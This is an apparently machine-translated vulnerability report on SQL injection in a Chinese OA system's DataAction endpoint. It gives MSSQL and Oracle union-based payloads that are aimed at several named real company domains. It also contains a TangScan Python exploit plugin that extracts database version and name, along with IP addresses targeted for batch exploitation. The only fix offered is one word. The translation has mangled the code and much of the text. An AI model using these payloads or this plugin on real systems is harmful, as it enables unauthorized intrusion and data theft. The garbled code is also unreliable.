An OA General SQL Injection Vulnerability

An OA General SQL Injection Vulnerability

1) General SQL injection vulnerability vendor: Source day Software

URL: http://www.visionsoft.com.cn/

Vulnerability link: ServiceAction/com. velcro. base. DataAction

Note: the OA system uses mssql and oracle databases. The case shows two types of poc utilization.

POC:

MsSql database:
ServiceAction/com. velcro. base. DataAction? SQL = | 20select | 20categoryids | 20from | 20project | 20where | 20id = ''and 1 = 2 union all select @ version & isworkflow = true

Oracle Database:
ServiceAction/com. velcro. base. DataAction? SQL = | 20select | 20categoryids | 20from | 20project | 20where | 20id = ''and 1 = 2 union all select (select banner from sys. v _ $ version where rownum = 1) from dual & isworkflow = true
(Direct access ):

MsSql

A) http://km.best-team.com.cn/ServiceAction/com.velcro.base.DataAction? SQL = | 20select | 20categoryids | 20from | 20project | 20where | 20id = % 27% 27% 20and % 201 = 2% 20 union % 20all % 20 select % 20 @ version & isworkflow = true

B) http://bms.9square.com.cn/ServiceAction/com.velcro.base.DataAction? SQL = | 20select | 20categoryids | 20from | 20project | 20where | 20id = % 27% 27% 20and % 201 = 2% 20 union % 20all % 20 select % 20 @ version & isworkflow = true

C) http://oa.jsfuan.com/ServiceAction/com.velcro.base.DataAction? SQL = | 20select | 20categoryids | 20from | 20project | 20where | 20id = % 27% 27% 20and % 201 = 2% 20 union % 20all % 20 select % 20 @ version & isworkflow = true
Oracle

D) http://winshare.com.cn/ServiceAction/com.velcro.base.DataAction? SQL = | 20select | 20categoryids | 20from | 20project | 20where | 20id = ''and 1 = 2 union all select (select banner from sys. v _ $ version where rownum = 1) from dual & isworkflow = true

E) http://oa.mcds.com/ServiceAction/com.velcro.base.DataAction? SQL = | 20select | 20categoryids | 20from | 20project | 20where | 20id = % 27% 27% 20and % 201 = 2% 20 union % 20all % 20 select % 20 (select % 20 banner % 20 from % 20sys. v _ $ version % 20 where % 20 rownum = 1) % 20 from % 20 dual & isworkflow = true

2) Let's say that the compiled plug-in code is provided directly to support TangScan (I am blind, blind, don't spray the Code). When the announcement is made, the plug-in has been written into TangScan.com.

#! /Usr/bin/env python #-*-coding: UTF-8-*-"Copyright (c) 2013-2014 TangScan developers ( http://www.wooyun.org/ ) See the file 'docs/copying' for COPYING permissionauthor: fate0 "" import refrom thirdparty import requestsfrom modules. exploit import TSExploit _ all _ = ['tangscan'] class TangScan (TSExploit): def _ init _ (self): super (self. _ class __, self ). _ init _ () self.info = {"name": "Microsoft Office system SQL Injection MSSQL Vulnerability (logon not required)", "product": "Source Day ", "product_version": "", "desc": "oa /ServiceAction/com. velcro. base. da Injection of SQL parameters in taAction may cause leakage of sensitive data "", "license": self. license. TS, "author": ["Coody"], "ref": [{self. ref. wooyun: "NONE"},], "type": self. type. injection, "severity": self. severity. high, "privileged": False, "disclosure_date": "2015-07-22", "create_date": "2015-07-23",} self. register_option ({"url": {"default": "", "required": True, "choices": [], "convert": self. convert. url_field, "desc": "target ur L "}) self. register_result ({"status": False, "data": {"db_info": {"version": "", "current_db": "" }}, "description ": "", "error": ""}) def verify (self): self. print_debug ("verify start") re_version_pattern = re. compile (R '(. + ?) ', Re. IGNORECASE | re. DOTALL | re. MULTILINE) exp_url = ("{domain}/ServiceAction/com. velcro. base. DataAction? SQL = | 20select | 20categoryids | 20from | 20project | 20where | 20id = ''and 1 = 2 union all select @ version & isworkflow = true ". format (domain = self. option. url) try: response = requests. get (exp_url, timeout = 15, verify = False) failed t Exception, e: self. result. error = str (e) return re_result = re_version_pattern.findall (response. content) if len (re_result) = 0: self. result. status = False return self. result. status = T Rue self. result. data. db_info.version = re_result [0] self. result. description = "target {url} has SQL injection. target database version: {db_version }". format (url = self. option. url, db_version = re_result [0]) def exploit (self): self. print_debug ("exploit start") re_userinfo_pattern = re. compile (R '(. + ?) ', Re. IGNORECASE | re. DOTALL | re. MULTILINE) exp_url = ("{domain}/ServiceAction/com. velcro. base. DataAction? SQL = | 20select | 20categoryids | 20from | 20project | 20where | 20id = ''and 1 = 2 union all select db_name () & isworkflow = true ". format (domain = self. option. url) try: response = requests. get (exp_url, timeout = 15, verify = False) failed t Exception, e: self. result. error = str (e) return re_result = re_userinfo_pattern.findall (response. content) if len (re_result) = 0: self. result. status = False return self. result. status = True self. result. data. db_info.current_db = re_result [0] self. result. description = "target {url} has SQL injection, Database Name: {current_db }". format (url = self. option. url, current_db = self. result. data. db_info.current_db) if _ name _ = '_ main _': from modules. main import main (TangScan ())

Check the result after executing the plug-in:

Run -- mode verify (default)

Run -- mode exploit

The plug-in runs normally and can output data smoothly ......
This should have ended.
But I mean it
Provides the Script test results for batch website detection.
The tested websites are:
Http: // 60.12.113.234: 8080/
Http: // 121.14.195.31: 8081/
Http: // 218.246.22.194: 8080/
In the test, run -- mode exploit to obtain database names in batches.

After the test is completed, check the success.txt content of the result file.


Well, it's time to end here ···
Solution:

Filter